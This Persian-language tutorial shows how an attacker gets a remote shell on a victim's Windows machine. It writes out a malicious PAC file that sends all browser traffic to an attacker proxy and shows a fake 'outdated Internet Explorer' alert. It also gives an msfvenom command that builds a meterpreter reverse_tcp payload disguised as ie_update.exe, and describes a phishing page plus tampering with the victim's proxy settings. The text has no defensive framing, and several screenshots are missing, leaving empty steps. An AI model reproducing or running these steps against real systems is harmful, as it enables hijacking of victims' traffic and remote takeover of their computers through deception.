در این مطلب می خواهیم روشی ارائه دهیم که مهاجم قادر است به کمک آن، بر روی سیستم قربانی shell بگیرد. برای اجرای این حمله، می خواهیم از یک فایل مخرب pac .* استفاده کنیم. اگر با فایل های PAC آشنایی ندارد و یا نمی دانید که چگونه می توان از این فایل ها در حملات گوناگون استفاده کرد، پیشنهاد می کنیم قبل از خواندن بقیه مطالب این صفحه، سری به مطلب "استفاده از فایل های PAC برای شنود اطلاعات" بزنید.

سناریوی مورد نظر:

برای اجرای این حمله، سناریویی را در نظر بگیرید که مهاجم به کمک یک فایل مخرب pac .*  تنظیمات Proxy سیستم قربانی را دست کاری می کند. سپس، قربانی شاهد باز شدن پنجره ی Pop-up ای بر روی سیستم خود هست که به او نوشته ای مبنی بر این که browser: IE شما قدیمی هست و باید فوراً update بشود، نشان داده می شود. حتی بعد از این که قربانی IE خود را باز می کند، هیچ صفحه webای را نمی تواند ببیند و تنها پیغامی مبنی بر دانلود یک فایل exe.* به وی نمایش داده می‌شود تا به کمک آن، IE خود را به آخرین نسخه update کند. ولی در اصل این فایل exe.* توسط مهاجم طراحی شده است و به محض این که فایل را قربانی به اجرا در آورد، مهاجم روی سیستم قربانی shell گرفته است. حالا در بخش "مراحل اجرای حمله"، می بینیم که چجوری می توان این حمله را پیاده کرد.

 

 مراحل اجرای حمله:

• مرحله اول: ساخت فایل مخرب PAC:

خب در مرحله اول، مهاجم باید فایل مخرب pac .* را طراحی بکند. همان طور که می دانید، فایل PAC از یک تابع JavaScript ای تشکیل شده است و همین موضوع می تواند به مهاجم کمک کند، تا از دستور معروف “()alert” در این فایل استفاده کند.

فایلی که مهاجم باید برای نمایش خطای قدیمی بودن IE قربانی در قالب یک پنجره Pop-up بسازد، از دستورات زیر تشکیل شده است:

function FindProxyForURL(url,host)

{

          var attacker_proxy = "PROXY <Attacker’s Proxy server>";

          alert("Your are using an old version of Internet Explorer! For your security please download the latest update for IE. ");

          return attacker_proxy;

}

با توجه به این که در این فایل محدودیتی بر روی دامنه، URL و ... در نظر گرفته نشده است، هر ترافیکی برای هر مقصدی، به proxy server مهاجم فرستاده می شود.

 

• مرحله دوم: طراحی فایل مخرب ie_update.exe:

با توجه به سناریویی که در ابتدای این مطلب بیان شد، هدف از اجرای این حمله، این هست که مهاجم با استفاده از روش های social engineering، قربانی را ترغیب نماید تا یک فایل مخرب را دانلود کرده و آن را به اجرا درآورد. فایل مخرب را ما با نام ie_update.exe به روش زیر می سازیم:

msfvenom -p payload windows/meterpreter/reverse_tcp LHOST=<attacker’s listener IP> LPORT=<attacker’s listener port> -f exe -o ie_update.exe

 

 

بعد از ساخت این فایل مخرب هم، مهاجم باید listener خودش را برای shell گرفتن روی سیستم قربانی راه‌اندازی نماید:

•  
• مرحله سوم: طراحی فایل index.html:

همان طور که به خاطر دارید، زمانی که از فایل های pac .* برای اجرای حملات بهره می بریم، باید صفحه مخربی که مورد نظر مهاجم هست، به عنوان محتوای فایل index.html که در proxy web server وجود دارد، قرار داده شود. روش مهندسی اجتماعی که در سناریوی این مطلب مورد استفاده قرار می گیرد، بدین ترتیب هست که قربانی با باز نمودن browser: Internet Explorer خود، هر آدرس URL ای را فراخوانی نماید، با صفحه طراحی شده توسط مهاجم مواجه می شود که به او پیغامی مبنی بر این که IE خود را update نمایید تا بتوانید از اینترنت استفاده کنید، نمایش داده می شود. در همین حین، فایل ie_update.exe که مهاجم آن را طراحی کرده است، به عنوان یک فایلی که قربانی باید از آن برای update استفاده کند، نمایش داده می شود.

با در نظر گرفتن روش social engineering مذکور، صفحه طراحی شده توسط مهاجم بدین شکل است:

 

 

 

• مرحله چهارم: قرار دادن فایل PAC طراحی شده در تنظیمات Proxy سیستم قربانی:

حالا که مهاجم تمام پیش نیازات اجرای حمله را انجام داده است، باید فایل proxy.pac طراحی شده را در تنظیمات IE مربوط به proxy سیستم قربانی معرفی کند. برای این کار، روش های مختلفی وجود دارد، در این سناریو فرض را بر این می گذاریم که مهاجم از  gadget: Harpy استفاده کرده و توانسته تنظیمات سیستم قربانی را به شکل زیر تغییر دهد:

 

 

به محض این که فایل proxy.pac که مهاجم آن را طراحی کرده، در تنظیمات سیستم قربانی قرار بگیرد، با توجه به دستور alert ای که در فایل مذکور نوشته شده بود، مهاجم بر روی سیستم خود با تصویر زیر مواجه می‌شود:

 

سپس زمانی که مهاجم Internet Explorer خود را باز نموده و آدرس URLای را در آن type می کند، با صفحه طراحی شده مهاجم مواجه می شود:

 

 

بعد از گذشت چند ثانیه از نمایش صفحه فوق، در IE یک پیغام برای دانلود فایل ie_update.exe نمایش داده می شود:

 

 

سپس هرگاه قربانی فایل ie_update.exe را دانلود کرده و آن را به اجرا در آورد، مهاجم توانسته بر روی سیستم قربانی shell بگیرد: